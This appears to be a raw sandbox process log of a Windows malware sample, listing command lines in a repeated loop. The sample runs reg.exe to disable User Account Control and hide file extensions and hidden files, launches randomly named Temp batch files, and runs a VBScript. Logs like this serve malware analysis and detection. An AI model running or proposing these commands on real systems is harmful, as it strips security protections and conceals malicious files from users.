C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYcMwMQw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tQoUooUg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWcIwIAo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DskMwcMA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ImgIokII.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KqkQgEgk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUMYwEEo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqwcggcg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xaUUUAoY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PmIYEoEU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DAAQEwYQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YqUIMIQA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aEcccoEg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gOEcoMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MkwsUcgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jicAQMEE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DQksYUMA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vQckEAUQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jGYIogIs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eowUUMEU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

